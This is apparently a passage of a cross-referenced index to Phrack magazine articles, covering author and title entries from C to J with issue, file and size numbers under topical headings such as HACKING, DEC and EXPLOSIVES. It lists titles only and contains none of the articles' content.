+   "The Open Barn Door" by Douglas Walter(Newsweek). 1992. I39 F9 11k
+   "Phrack Editorial on Microbashing" by The Nightstalker. 1988. I19 F6 6k
+   "Phrack Inc./Gossip [from Metal Shop Private BBS]" 1988. I20 F6 56k
+   "Phreak/Hack Sub [from Metal Shop Private BBS]" 1988. I20 F7 46k
+   "Phreaks in Verse" by Sir Francis Drake. 1987. I13 F5 3k
+   "Preview to Phrack 13-The Life & Times of The Executioner" 1987. I12 F3 5k
+   "R.A.G. - Rodents are Gay" by Evil Jay. 1987. I13 F6 6k
+   "Radio Free Berkley Information" 1994. I45 F24 35k
+   "RAGS - The Best of Sexy Exy" 1987. I13 F9 19k
+   "Real Cyberpunks" by The Men From Mongo. 1991 I36 F9 13k
+   "The Royal Court [from Metal Shop Private BBS]" 1988. I20 F10 3k
+   "Scan Man's Rebuttal to Phrack World News" by Scan Man. 1987. I12 F9 17k
+   "Searching for speciAL acceSs agentS" by Dr. Dude. 1991. I36 F7 18k
+   "The Senator Markey Hearing Transcripts" by >Unknown User<. I45 F20 72k
+   "Shadows of a Future Past (Part 1 of The Vicious Circle Trilogy)" by
+      Knight Lightning. 1988. I21 F3 26k
+   "Social Engineering [from Metal Shop Private BBS]" 1988. I20 F8 19k
+   "Subdivisions (Part 3 of The Vicious Circle Trilogy)" by Knight Lightning
+      1989. I23 F3 17k
+   "SummerCon 1992" by Knight Lightning and Dispater. 1992. I40 F11 35k
+   "The Truth...and Nothing but the Truth" by Steve Fleming. 1996. I48 F16 19k
+   "Timeline Featuring Taran King, Knight Lightning, Cheap Shades" 1988.
+      I20 F3 3k
+   "A Trip to The NCSC" by Knight Lightning. 1990. I32 F7 16k
+   "Welcome to Metal Shop Private" by Taran King, Knight Lightning, and Cheap
+      Shades. 1988. I20 F4 37k
+
+"Cyber Christ Meets Lady Luck Part I" by Winn Schwartau. 1994. I46 F19 45k
+"Cyber Christ Meets Lady Luck Part II" by Winn Schwartau. 1994. I46 F20 42k
+"Cyber Christ Bites The Big Apple" by Winn Schwartau. 1994. I46 F23 60k
+Cyber Neuron Limited co-authored
+        "Covert Paths" 1989. I29 F5 4k
+
+
+
+                                   ** D **
+
+
+daemon9 authored
+        "IP-Spoofing Demystified" 1996. I48 F13 25k
+        "Netmon" 1996. I48 F15 21k
+        "Project Hades: TCP Weakness" 1996. I49 F7 38k
+        "Project Neptune" 1996. I48 F13 52k
+   co-authored
+        "Project Loki: ICMP Tunneling" 1996. I49 F7 38k        
+daemon9 was Pro-Philed in 1996. I48 F5 23k
+Damien Thorn authored
+        "Tandy/Radio Shack Cellular Phones" 1996. I48 F7 43k        
+Dark Overlord authored
+        "Sending Fakemail in Unix" 1989. I27 F8 2k
+        "Snarfing Remote Files" 1989. I28 F6 5k
+        "Unix Cracking Tips" 1989. I25 F5 14k
+Data Line authored
+        "Hacking RSTS". 1985. I2 F8 4k
+        "Ring Back Codes for The 314 NPA" 1985. I4 F2 1k
+        "Signalling Systems Around The World" 1986. I3 F4 2k
+"Datapac" by Synapse. 1993. I44 F21 36k
+Data Stream Cowboy authored
+        "Network Miscellany IV" 1992 I38 F5 30k
+        "Network Miscellany V" by Datastream Cowboy. 1992. I39 F4 34k
+        "Phrack World News" Parts 1-3 1992. I40 F12-14 50,48,48k
+        "Phrack World News" Parts 1-3 1992. I41 F11-13 46,49,43k
+        "Phrack World News" 1992. I42 F14 29k
+        "Phrack World News" 1993. I43 F27 24k
+        "Phrack World News" 1993. I44 F27 22k
+        "Phrack World News" 1994. I45 F28 17k
+        "Phrack World News" 1994. I46 F28 38k
+        "Phrack World News" 1995. I47 F22 38k        
+        "Phrack World News" 1996. I48 F18 21k
+   co-authored
+        "Phrack World News" Parts 1-3 1992. I38 F13-15 34,32,33k
+        "Phrack World News" Parts 1-4 1992. I39 F10-13 30,27,29,29k
+   
+"Data Tapping Made Easy" by Elric of Imrryr. 1988. I17 F9 4k
+"A Day in The Life of a Warez Broker" by Xxxx Xxxxxxxx. 1995. I47 F20 13k
+"DBA Primer from American Hacker Magazine" 1995. I47 F16 45k
+"DCL BBS Program" by Raoul. 1994. I45 F16 23k
+"DCL Utilities for VMS Hackers" by The Mentor. 1988. I19 F2 23k
+"DCO Operating System" by mrnobody. 1997. I50 F14 16k
+Dcypher wrote
+        "Key Trap v1.0 Keyboard Key Logger" 1994. I46 F26 35k
+Dead Cow co-authored
+        "Advanced Modem Oriented BBS Security" 1991. I34 F9 11k
+Dead Lord co-authored 
+        "Basic Concepts of Translation" 1989. I26 F6 20k
+        "*ELITE* Access" 1991. I36 F5 43k
+
+DEC (DECnets and oTher DECs)
+   "Crashing DEC-10's" by The Mentor. 1986. I4 F6 5k
+   "DECnet Hackola : Remote Turist TTY (RTT)" by *Hobbit*. 1989. I30 F6 6k
+   "Hacking DEC's" by Carrier Culprit. 1986. I5 F3 23k
+   "Looking Around in DECnet" by Deep Thought. 1989. I27 F6 14k
+   "Multi-User Chat Program for DEC-10's" by TTY-Man and The Mentor. 1986.
+    I9 F7 7k
+
+"Decnet Hackola : Remote Turist TTY (RTT)" by *Hobbit*. 1989. I30 F6 6k
+"The DECWRL Mail Gateway" by Dedicated Link. 1989. I30 F5 23k
+Dedicated Link authored
+        "The DECWRL Mail Gateway" 1989. I30 F5 23k
+        "Network Progression" 1989. I24 F10 5k
+Deep Thought authored 
+        "Looking Around in DECnet" 1989. I27 F6 14k
+"Defcon Information" by Various Sources. 1995. I47 F9 28k
+"Defcon II Information" by Various Sources. 1994. I45 F14 26k
+Demon Seed Elite co-authored
+        "The Legion of Doom & The Occult" 1991. I36 F6 24k
+"Dial-Back Modem Security" by Elric of Imrryr. 1988. I17 F8 9k
+"DIALOG Information Network" by Brian Oblivion. 1992. I39 F5 43k
+"Digital Multiplexing Systems (Part 2)" by Control C. 1988. I19 F3 18k
+"Diet Phrack Loopback" by Phrack Staff. 1991. I36 F2 14k
+"The Digital Telephony Proposal" by The FBI. 1992. I38 F11 34k
+The Disk Jockey authored
+        "Advanced Carding XIV" 1987. I15 F4 12k
+        "Getting Caught: Legal Procedures" 1989. I26 F3 12k
+        "Reading Trans-Union Credit Reports" 1987. I16 F7 6k
+        "Phrack Pro-Phile on The Disk Jockey"(co-authored) 1991. I34 F3 23k
+The Disk Jockey was Pro-philed 1991. I34 F3 23k
+Dispater authored 
+        "A Real Functioning PEARL BOX Schematic" 1989. I28 F5 5k
+        "Beating The Radar Rap Part 1/2" 1992. I27 F5 12k 44k
+        "Beating The Radar Rap Part 2/2" 1992. I28 F6 5k 15k
+        Introduction/Index I37,I38,40,41 F1
+        "Phrack Pro-Phile on Aristotle" 1992. I38 F3 6k
+        "Phrack Pro-Phile on Shadow Hawk 1" 1992. I39 F3 8k
+        "Phrack World News" 1991. I33(F12,13 28/25k) I34(F10,11 14/19k)
+         I35(F10-13 27,31,34,27k)
+   co-authored
+        "Phrack Loopback" 1992. I40 F2 50k
+        "Phrack Loopback" 1992. I41 F2 52k
+        "Phrack Pro-Phile on The Disk Jockey" 1991. I34 F3 23k
+        "Phrack World News" Parts 1-4 1992. I37 F11-14 31,30,29,31k
+        "Phrack World News" Parts 1-3 1992. I38 F13-15 34,32,33k
+        Introduction/Index 29,I33,34 F1
+        "SummerCon 1992" 1992. I40 F11 35k
+Disorder authored
+        "Phrack World News" 1996. I49 F16 109k
+"DMS-100" by Knight Lightning. 1986. I5 F5 8k
+Doc Holiday authored
+        "Hacking Rolm's CBXII" 1990. I31 F3 15k
+        Introduction/Index for I31 F1
+        "Knight Line I/Parts 1-3" 1990. I32 F10 47k-12   
+Docter Who was Pro-Philed in 1993. I43 F6 15k
+Doom Prophet authored
+        "Are You a Phone Geek?" 1987. I13 F7 9k
+        "Telephone Signalling Methods" 1987. I11 F8 8k
+        "The Total Network Data System" 1987. I12 F5 13k
+   co-authored
+        "Automatic Number Identification" 1987. I10 F7 9k
+        "Loop Maintenance Operations System" 1986. I9 F9 17k        
+Dorthy Denning authored
+        "Concerning Hackers Who Break Into Computer Systems" 1990. I32 F3 60k
+Double Helix co-authored 
+        "How to Build a Paisley Box" 1987. I13 F4 5k
+Douglas Walter(Newsweek) authored
+        "The Open Barn Door" 1992. I39 F9 11k
+Dr. BOB authored
+        "A Guide to British Telecom's Caller ID Service" 1995. I47 F19 31k
+Dr. Crash authored
+        "The Technical Revolution" 1986. I6 F3 4k
+Dr. Delam authored
+        "The MCX7700 PABX System" 1994. I45 F25 22k
+   co-authored
+        "Gettin' Down 'N Dirty Wit Da GS/1" 1994. I46 25k
+Dr. Dimitri Vulis authored
+        "Content-Blind Cancelbot" I49 F9 40k
+Dr. Doom authored
+        "The Integrated Services Digital Network" 1986. I8 F4 18k
+Dr. Dude(Dispater) co-authored
+       "Introduction to Diet Phrack"  1991. I36. F1 8k
+       "Searching for speciAL acceSs agentS" 1991. I36 F7 18k
+       "Elite World News" I36 F10,11 23/26k
+Dr. No-Good authored       
+       "Basic Commands for The VOS System" 1992. I37 F8 10k
+
+DRUGS
+   "The Tried and True Home Production Method for Methamphetamine" by The
+    Leftist. 1986. I4 F8 7k
+
+"DTMF signalling and decoding" by Mr. Blue. 1997. I50 F13 17k
+"Dun & Bradstreet Report on AT&T" submitted by Elric of Imrryr. 1988. I17 F2
+ 24k
+"Dun & Bradstreet Report on Pacific Telesis" submitted by Elric of Imrryr.
+ 1988. I17 F3 26k
+
+
+                                   ** E **
+
+
+The Eavesdropper authored
+        "Control Office Administration of Enhanced 911 Service" 1989.
+         I24 F5 22k
+        "Glossary Terminology for Enhanced 911 Service" 1989. I24 F6 12k
+"Eavesdropping" by Circle Lord. 1986. I3 F7 3k
+EBA authored 
+        "Cosmos Overview" 1990. I31 F6 52k
+The Editor(s) authored
+        Introduction/Index I42 F1 14k
+        Introduction/Index I43 F1 24k
+        Introduction/Index I44 F1 16k
+        Introduction/Index I45 F1 17k
+        Introduction/Index I46 F1 17k
+        Introduction/Index I47 F1 16k
+        Introduction/Index I48 F1 13k
+        Introduction/Index I49 F1 7k
+        Introduction/Index I50 F1 9k
+        "Sara Gordon -vs- Kohntark Part I" 1993. I44 F11 12k
+        "Sara Gordon -vs- Kohntark Part II" 1993. I44 F12 47k
+        
+Electronic Frontier Foundation authored
+        "The CompuServe Case" by Electronic Frontier Foundation. 1992. I37 F9 6k
+"Electronic Telephone Cards(Part 1)" by Stephane Bausson. 1996. I48 F10 39k
+"Electronic Telephone Cards(Part 2)" by Stephane Bausson. 1996. I48 F11 66k
+"*ELITE*" Access by Dead Lord and Lord Digital(Lords Anonymous!). 1991.
+ I36 F5 43k
+"Elite World News" br Docter Dude I36 F10,11 23/26k
+Elric of Imrryr authored
+        "A Beginner's Guide to The IBM VM/370" 1987. I10 F4 4k
+        "Data Tapping Made Easy" 1988. I17 F9 4k
+        "Dial-Back Modem Security" 1988. I17 F8 11k
+        "Gelled Flame Fuels" 1987. I15 F5 12k
+        Introduction/Index of I16 F1 2k
+  submitted
+        "Dun & Bradstreet Report on AT&T" 1988. I17 F2 24k
+        "Dun & Bradstreet Report on Pacific Telesis" 1988. I17 F3 26k
+Emmanuel Goldstein authored
+        "No Time for Goodbyes" 1994. I45 F9 21k
+Emmanuel Goldstein was Pro-Philed in 1989. I29 F2 16k
+Epsilon authored
+        "An Introduction to Packet Switched Networks" 1988. I18 F3 12k
+        "Phrack World News" 1988. I18 F10-11  I19 F8
+Epsilon co-authored 
+        "Phrack World News" 1988. I21 F10 22k-11
+Equal Axis authored 
+        "OTher Common Carriers; A List" 1989. I28 F7 8k
+Erik Bloodaxe authored
+        "The Wonderful World of Pagers" 1994. I46 F8
+        "HOPE" 1994. I46 F22 51k        
+Erik Bloodaxe was Pro-Philed in 1989. I28 F2 15k
+Erudite authored
+        "AT&T Definity System 75/85" by Erudite. 1994. I46 F25 35k        
+Evil Jay authored
+        "Hacking : OSL Systems" 1987. I12 F7 9k
+        "Hacking Primos I, II, III" 1987. I11 F7 7k
+        "Hacking Primos Part I" 1987. I10 F6 11k
+        "R.A.G. - Rodents are Gay" 1987. I13 F6 6k
+The Executioner
+        "Preview to Phrack 13-The Life & Times of The Executioner" 1987.
+         I12 F3 5k
+The Executioner authored
+        "Circuit Switched Digital Capability" 1987. I10 F5 12k
+        "City-Wide Centrex" 1986. I8 F3 14k
+        "CSDC II - Hardware Requirements" 1987. I12 F6 8k
+        "PACT: Prefix Access Code Translator" 1987. I11 F3 8k
+        "Plant Measurements" 1986. I9 F6 13k
+"Exploring Information-America" by The Omega & White Knight. 1992. I37 F4 51k
+
+EXPLOSIVES
+   "Bolt Bombs" by The Leftist. 1986. I5 F6 3k
+   "Gelled Flame Fuels" by Elric of Imrryr. 1987. I15 F5 12k
+   "How to Make an Acetylene Bomb" by The Clashmaster. 1985. I1 F7 4k
+   "How to Make TNT" by The Radical Rocker. 1986. I7 F6 2k
+   "Making Shell Bombs" by Man-Tooth. 1986. I3 F3 3k
+   "Nitrogen-Trioxide Explosive" by Signal Substain. 1988. I17 F4 7k
+   "Smoke Bombs" by Alpine Kracker. 1986. I6 F6 2k
+
+"extract.c" by Phrack Staff. 1997. I50 F16 2k
+
+
+                                   ** F **
+
+
+"Facility Assignment & Control Systems" by Phantom Phreaker. 1988. I19 F5 11k
+"False Identification" by Forest Ranger. 1986. I4 F3 3k
+Federal Bureau of Investigations(FBI) authored
+        "The Digital Telephony Proposal" 1992. I38 F11 34k
+"FEDIX On-Line Information Service" by Fedix Upix. 1991 I33 F4 12k
+Fedix Upix authored "Fedix On-line Information Service" 1991 I33 F4 12k
+"A Few Things About Networks" by Prime Suspect. I18 F9 21k
+"The fingerd Trojan Horse" by Hitman Italy. 1994. I46 F12 32k
+Firm G.R.A.S.P. authored
+        "Acronyms Part I" 1993. I43 F21 50k
+        "Acronyms Part II" 1993. I43 F22 51k
+        "Acronyms Part III" 1993. I43 F23 45k
+        "Acronyms Part IV" 1993. I43 F24 52k
+        "Acronyms Part V" 1993. I43 F25 46k
+        "Guide to 5ESS" 1993. I43 F16 63k
+The Fixer wrote
+        "Box.exe for SoundBlasters"<unencoded> 1994. I45 F22 13k
+"The Fone Phreak's Revenge" by Iron Soldier. 1985. I1 F4 4k
+Forest Ranger authored
+        "False Identification" 1986. I4 F3 3k
+        "Prevention of The Billing Office Blues" 1985. I2 F2 1k
+        "Fortell Systems" by Phantom Phreaker. 1986. I3 F6 3k
+        "Foundations on The Horizon; Chapter Two of FTSaga" by Knight Lightning.
+         1989. I23 F5 27k
+Framstag authored 
+        "The Making of a Hacker" 1989. I27 F7 9k
+"Fraudulent Applications of 900 Services" by Co/Dec. 1994. I45 F18 15k
+Fred P. Graham co-authored
+        "Can You Find Out If Your Telephone is Tapped?" 1989. I23 F9 20k
+"The Freedom of Information Act and You" by Vince Niel. 1992. I42 F12 42k
+"Frontiers; Chapter Four of FTSaga" by Knight Lightning. 1989. I24 F4 25k
+"Fun With Automatic Tellers" by The Mentor. 1986. I8 F7 7k
+"Fun With The Centagram VMS Network" by Oryan Quest. 1986. I9 F3 4k
+"Fun With Lighters" by The Leftist. 1986. I6 F4 2k
+"Future Trancendent Saga Index A" from The BITNET Services Library. 1989.
+ I23 F6 14k
+"Future Trancendent Saga Index B" from The BITNET Services Library. 1989.
+ I23 F7 17k
+FyberLyte authored
+        "NorThern Telecom's FMT-150B/C/D" 1993. I44 F13 16k
+        
+
+                                   ** G **
+
+
+"Gail Takes a Break" <unencoded .gif> 1993. I44 F25 49k
+Gatsby authored
+        "A Hackers Guide to The Internet" 1991. I33 F3 45k 
+G.Tenet authored        
+        "Useful Commands for The TP3010 Debug Port" 1992. I42 f7 28k
+"Gelled Flame Fuels" by Elric of Imrryr. 1987. I15 F5 12k
+"Getting Caught: Legal Procedures" by The Disk Jockey. 1989. I26 F3 12k
+"Gettin' Down 'N Dirty Wit Da GS/1" By Maldoror & Dr. Delam. 1994. I46 25k
+"Getting Serious About VMS Hacking" by VAXBusters International. 1989.
+ I23 F8 13k
+G. Gilliss authored
+        "Introduction to CGI and CGI vulnerabilities" 1996. I49 F8 12k
+Gin Fizz co-authored
+        "How to Pick Master Locks" 1985. I1 F6 2k
+"The Glenayre GL3000 Paging and Voice retrieval System" by Armitage. 1995.
+ I47 F14 25k   
+"Glossary Terminology for Enhanced 911 Service" by The Eavesdropper. 1989.
+ I24 F6
+Goe authored 
+        "Hacking VM/CMS" 1989. I30 F4 58k
+Grey Sorcerer authored
+        "How to Hack Cyber Systems" 1988. I17 F5 23k
+        "How to Hack HP2000's" 1988. I17 F6 3k
+Grimace authored
+        "Phrack Pro-Phile on Computer Cop" 1993. I43 F5 22k
+"The Groom Lake Desert Rat" by PsychoSpy. 1994. I46 F21 44k
+"Guide to 5ESS" by Firm G.R.A.S.P.. 1993. I43 F17 63k
+"A Guide to British Telecom's Caller ID Service" by Dr. BOB 1995. I47 F19 31k
+"Guide to Data General's AOS/VS Part I" by Herd Beast. 1993. I44 F14 46k
+"Guide to Data General's AOS/VS Part II" by Herd Beast. 1993. I44 F15 30k
+"Guide to Encryption" by The Racketeer[HFC]. 1992. I42 F11 32k
+"A Guide To Porno Boxes" By Carl Corey. 1994. I46 F10 13k
+
+
+                                  ** H **
+
+
+"The #hack FAQ (Part 1)" by Voyager. 1995. I47 F5 39k
+"The #hack FAQ (Part 2)" by Voyager. 1995. I47 F6 38k
+"The #hack FAQ (Part 3)" by Voyager. 1995. I47 F7 51k
+"The #hack FAQ (Part 4)" by Voyager. 1995. I47 F8 47k
+"A Hacker's Guide to Primos: Part 1" by Cosmos Kid. 1987. I16 F3 11k
+"Hacker's Manifesto" by The Mentor. 1986. I7 F3 4k
+
+HACKING
+(See also BANK FRAUD, COSMOS, CRACKING, CREDIT BUREAUS, CULTURE, DEC, HP,
+ Phrack Pro-Phile, Phrack World News, PHREAKING, PRIMOS, RSTS, UNIX, VAX/VMS,
+ VM/CMS, VOICE MAIL, WIDE AREA NETS (Internet,BITNET,ArpaNet,Usenet,UUCP,etc),
+ X.25 NETS (Telenet, Tymnet,etc.)
+   "25th Anniversary Index [of Phrack]" by Taran King, Knight Lightning and
+      friends. 1989. I25 F2 15k
+   "Accessing Government Computers" by The Sorceress. 1988. I17 F7 9k
+   "An Introduction to The DecServer 200" by Opticon. 1993. I44 F22 16k
+   "The Art of Investigation" by Butler. 1990. I32 F4 18k
+   "AT&T Definity System 75/85" by Erudite. 1994. I46 F25 35k
+   "Basic Concepts of Translation" by The Dead Lord and Chief Executive
+      Officers. 1989. I26 F6 20k
+   "BELLCORE Information" by The Mad Phone-Man. 1987. I16 F2 11k
+   "Cracking NT Passwords" by Nihil. 1997. I50 F8 17k
+   "CompuServe Info" by Morgoth and Lotus. 1986. I8 F6 8k
+   "CSDC II - Hardware Requirements" by The Executioner. 1987. I12 F6 8k
+   "Datapac" by Synapse. 1993. I44 F21 36k
+   "Data Tapping Made Easy" by Elric of Imrryr. 1988. I17 F9 4k
+   "DBA Primer from American Hacker Magazine" 1995. I47 F16 45k
+   "Dial-Back Modem Security" by Elric of Imrryr. 1988. I17 F8 11k
+   "The fingerd Trojan Horse" by Hitman Italy. 1994. I46 F12 32k
+   "Getting Caught: Legal Procedures" by The Disk Jockey. 1989. I26 F3 12k
+   "Gettin' Down 'N Dirty Wit Da GS/1" By Maldoror & Dr. Delam. 1994. I46 25k
+   "Hacking AT&T System 75" by Scott Simpson. 1992. I41 F6 20k
+   "Hacking CDC's Cyber" by Phrozen Ghost. 1988. I18 F5 12k
+   "The #hack FAQ (Part 1)" by Voyager. 1995. I47 F5 39k
+   "The #hack FAQ (Part 2)" by Voyager. 1995. I47 F6 38k
+   "The #hack FAQ (Part 3)" by Voyager. 1995. I47 F7 51k
+   "The #hack FAQ (Part 4)" by Voyager. 1995. I47 F8 47k
+   "Hacking GTN" by The Kurgan. 1987. I16 F4 7k
+   "Hackers Guide to The Internet" by The Gatsby 1991. I33 F2 45k
+   "Hacking : OSL Systems" by Evil Jay. 1987. I12 F7 9k
+   "Hacking: What's Legal and What's Not" by Hatchet Molly. 1989. I25 F8 12k
+   "How to Hack Cyber Systems" by Grey Sorcerer. 1988. I17 F5 23k
+   "How to Build a DMS-10 Switch by The Cavalier. 1992 I41 23k
+   "Inside Dialog" by Control C. 1986. I9 F5 8k
+   "Introduction to Videoconferencing" by Knight Lightning. 1986. I9 F8 11k
+   "Key Trap v1.0 Keyboard Key Logger" by Dcypher. 1994. I46 F26 35k
+   "Keytrap Revisisted" by Sendai. 1996. I48 F12 13k
+   "Legal Info" by Szechuan Death. 1994. I46 F9 13k
+   "A Little About Dialcom" by Herd Beast. 1994. I46 F14 29k
+   "Netmon" by daemon9. 1996. I48 F15 21k
+   "Non-Published Numbers" by Patrick Townsend. 1988. I21 F7 8k
+   "A Novice's Guide to Hacking (1989. Edition)" by The Mentor. 1988. I22 F4 42k
+   "PC Application Level Security" by Sideshow Bob. 1997. I50 F12 21k
+   "The Phrack University Dialup List" by Phrack Staff. 1994. I46 F13 12k
+   "Plant Measurement" by The Executioner. 1986. I9 F6 13k
+   "Private Audience" by Overlord. 1986. I3 F5 13k
+   "Radio Hacking" by The Seker. 1986. I5 F8 3k
+   "Reading Trans-Union Credit Reports" by The Disc Jockey. 1987. I16 F7 6k
+   "Ring Back Codes for The 314 NPA" by Data Line. 1985. I4 F2 1k
+   "Satellite Communications" by Scott Holiday. 1988. I21 F5 9k
+   "School/College Computer Dial-Ups" by Phantom Phreaker. 1985. I1 F8 4k
+   "Searching The Dialog Information Service" by Al Capone. 1993. I44 F18 48k
+   "Security Shortcomings of AppleShare Networks" by Bobby Zero. 1992.
+    I41 F9 16k
+   "Simple Data Encryption or Digital Electronics 101" by The Leftist. 1987.
+    I11 F5 4k
+   "Smashing The Stack For Fun And Profit" by Aleph1. 1996. I49 F14 66k
+   "The Tele-Pages" by Jester Sluggo. 1988. I21 F4 37k
+   "TTY Spoofing" by VaxBuster 1992. I41 F8 20k
+   "Western Union Telex, TWX, and Time Service" by Phone Phanatic. 1989. I30
+       F10
+
+"Hacking AT&T System 75" by Scott Simpson. 1992. I41 F6 20k
+"Hackers Guide to The Internet" by The Gatsby 1991 I33 F3 45k
+"Hacking CDC's Cyber" by Phrozen Ghost. 1988. I18 F5 12k
+"Hacking Chilton's Credimatic" by Ryche. 1986. I7 F4 8k
+"Hacking DEC's" by Carrier Culprit. 1986. I5 F3 23k
+"Hacking GTN" by The Kurgan. 1987. I16 F4 7k
+"Hacking : OSL Systems" by Evil Jay. 1987. I12 F7 9k
+"Hacking Primos I, II, III" by Evil Jay. 1987. I11 F7 7k
+"Hacking Primos Part I" by Evil Jay. 1987. I10 F6 11k
+"Hacking Rolm's CBXII" by Doc Holiday. 1990. I31 F3 15k
+"Hacking RSTS" by Data Line. 1985. I2 F8 4k
+"Hacking RSTS Part 1" by The Seker. 1986. I7 F5 12k
+"Hacking and Tymnet" by SynThecide. 1989. I30 F3 20k
+"Hacking VM/CMS" by Goe. 1989. I30 F4 58k
+"Hacking Voice Mail Systems" by Black Knight from 713. 1987. I11 F4 6k
+"Hacking Voice Mail Systems" by Night Ranger. 1991. I34 F6 19k
+"Hacking: What's Legal and What's Not" by Hatchet Molly. 1989. I25 F8 12k
+"Hacking WWIV:The Complete Guide" by Inhuman. 1991 I34 F5 20k
+Halflife authored
+        "Linux TTY hijacking" 1997. I50 F5 15k
+"Hand to Hand Combat" by Bad Boy in Black. 1986. I5 F4 13k
+"Hardwire Interfacing under Linux" by Professor. 1997. I50 F11 11k
+Hatchet Molly authored
+        "Hacking: What's Legal and What's Not" 1989. I25 F8 12k
+"Help for Verifying Novell Security" by Phrack Staff. 1993. I43 F11 48k
+Herd Beast authored
+        "Guide to Data General's AOS/VS Part I" 1993. I44 F14 46k
+        "Guide to Data General's AOS/VS Part II" 1993. I44 F15 30k
+        "A Little About Dialcom" 1994. I46 F14 29k
+"Hiding Out Under Unix" by Black Tie Affair. 1989. I25 F6 9k
+High Evolutionary authored 
+        "Cellular Telephones" 1986. I6 F7 5k          
+"The History of The Legion of Doom" 1990. I31 F5 10k
+"The History ah MOD" by Wing Ding. 1991 I36 F4 23k
+Hitman Italy authored
+        "The fingerd Trojan Horse" 1994. I46 F12 32k        
+*Hobbit* authored
+        "Decnet Hackola : Remote Turist TTY (RTT)". 1989. I30 F6 6k
+"HoHoCon" by Netta Gilboa. 1995. I47. F10 30k
+"HoHoCon" by Count Zero. 1995. I48. F11 33k
+"HoHoCon"(review)by Various Sources. 1992. I42 F13 51k
+"HoHoCon Miscellany" by Various Sources. 1994. I45 F11 32k
+"HoHoCon Miscellany" by Various Sources. 1995. I47 F12 33k
+"Hollywood-Style Bits & Bytes" by Richard Goodwin. 1994. I45 F17 50k
+"Homemade Guns" by Man-Tooth. 1985. I2 F3 7k
+Homey The Hacker authored
+        "Phreaks in Verse" 1991. I36 F8 14k
+"HOPE" by Erik Bloodaxe. 1994. I46 F22 51k
+"How to Build a DMS-10 Switch" by The Cavalier. 1992 I41 F7 23k
+"How to Build a Paisley Box" by Thomas Covenant and Double Helix. 1987.
+ I13 F4 5k
+"How To Hack Blackjack Part I" by Lex Luthor. 1993. I43 F9 52k
+"How To Hack Blackjack Part II" by Lex Luthor. 1993. I43 F10 50k
+"How to Fuck Up The World - A Parody" by Thomas Covenant. 1987. I13 F3 10k
+"How to Hack Cyber Systems" by Grey Sorcerer. 1988. I17 F5 23k
+"How to Hack HP2000's" by Grey Sorcerer. 1988. I17 F6 3k
+"How to Pick Master Locks" by Gin Fizz and Ninja NYC. 1985. I1 F6 2k
+"How to Make an Acetylene Bomb" by The Clashmaster. 1985. I1 F7 4k
+"How to Make TNT" by The Radical Rocker. 1986. I7 F6 2k
+"How We Got Rich Through Electronic Funds Transfer" by Legion of Doom!. 1989.
+ I29 F7
+
+HP SERIES (HP2000, HP3000, HP9000 etc.)
+   "How to Hack HP2000's" by Grey Sorcerer. 1988. I17 F6 3k
+
+
+                                   ** I **
+
+Iceman authored
+        "NorThern Telecom's SL-1" 1993. I44 18 30k
+Ice Jay authored
+        "VisaNet Operations Part I" 1994. I46 F15 50k
+        "VisaNet Operations Part 2" 1994. I46 F16 44k        
+Icon authored
+        "South Western Bell Lineman Word Codes" 1997. I49 F11 18k
+Infinite Loop authored
+        "LATA Referance List" 1991 I33 F5 11k
+"Information About NT's FMT-150/B/C/D" by Static. 1996. I48 F9 22k
+"An In-Depth Guide in Hacking Unix" by Red Knight. 1988. I22 F5 35k
+"Inside Dialog" by Control C. 1986. I9 F5 8k
+"Inside The SYSUAF.DAT File" by Pain Hertz. 1990. I32 F8 16k
+"The Integrated Services Digital Network" by Dr. Doom. 1986. I8 F5 18k
+"International Scene" by Various Sources 1993. I43 F26 51k
+"International Scene" by Various Sources 1993. I43 F26 25k
+"International Scene" by Various Sources 1994. I45 F27 63k
+"International Scene" by Various Sources 1994. I46 F27 44k
+"International Scene" by Various Sources 1995. I47 F21 39k
+"International Scene" by Various Sources 1996. I48 F17 33k
+
+INTERNET see WIDE AREA NETWORKS
+
+"Internet Domains: FTSaga Appendix 3 (Limbo to Infinity)" by Phrack Inc.
+ 1989. I26 F8 20k
+"Interview With Agent Steal" by Agent 005. 1993. I44 F16 14k
+"Introduction to CGI and CGI vulnerabilities" by G. Gilliss. 1996. I49 F8 12k
+"An Introduction to The DecServer 200" by Opticon. 1993. I44 F22 16k
+"Introduction to the FedLine software system" by Parmaster. 1996. I49 F12 19k
+"Introduction to The Internet Protocols: Chapter Eight of The FTS" by Knight
+ Lightning. 1989. I28 F3 39k
+"Introduction to The Internet Protocols II: Chapter Nine of The FTS" by Knight
+ Lightning. 1989. I29 F3 43k
+"Introduction to MIDNET: Chapter Seven of The FTS" by Knight Lightning.
+ 1989. I27 F3 35k
+"Introduction to MILNET" by Brigadier General Swipe. 1991 I34 F7 8k
+"Introduction to Octel's ASPEN" by Optik Nerve. 1994. I45 F23 12k
+"An Introduction to Packet Switched Networks" by Epsilon. 1988. I18 F3 12k
+"Introduction of Phrack" by Taran King. 1985. I1 F1 2k
+"Introdcution to Telephony and PBX Systems" by Cavalier. 1996. I49 F5 100k
+"Intro to Packet Radio" by Larry Kollar. 1993. I44 F9 16k
+"Introduction to PBX's" by Knight Lightning. 1986. I3 F9 7k
+"Introduction to Videoconferencing" by Knight Lightning. 1986. I9 F8 11k
+Iron Soldier authored 
+        "The Fone Phreak's Revenge" 1985. I1 F4 4k
+Inhuman Authored
+        "The Complete Guide to Hacking WWIV" 1991. I34 F5 20k
+"In Living Computer Starring Knight lightning" 1991. I36 F3 10k
+"IP-Spoofing Demystified" by daemon9. 1996. I48 F13 25k
+ISDN (INTEGRATED SERVICES DIGITAL NETWORK)
+   "The Integrated Services Digital Network" by Dr. Doom. 1986. I8 F4 18k
+   "Universal Informational Services via ISDN" by Taran King. 1985. I2 F6 6K 
+
+
+                                   ** J **
+
+Jack T. Tabb authored 
+        "VAX/VMS Fake Mail". 1989. I30 F7 7k
+Jester Sluggo authored
+        "Automatic Teller Machine Cards" 1990. I32 F6 16k
+        "Centrex Renaissance" 1986. I4 F7 17k
+        "The Tele-Pages" 1988. I21 F4 37k
+        "Unix System Security Issues" 1988. I18 F7 27k
+        "Wide Area Networks Part 1" 1986. I5 F7 10k
+        "Wide Area Networks Part 2" 1986. I6 F8 10k
+J.R. "Bob" Dobbs authored
+        "A REAL Functioning RED BOX Schematic" 1991. I33 F9 12k
+Jim Schmickley authored
+        "Blocking of Long Distance Calls" 1988. I21 F8 26k
+        "Blocking of Long Distance Calls... Revisited" 1989. I29 F9 22k
+"The Judas Contract (Part 2 of The Vicious Circle Trilogy)" by Knight Lightning.
+ 1988. I22 F3 26k
+"Juggernaut"(linux tool) by route. 1997. I50 F6 123k
+
+
+                                   ** K **
+
+
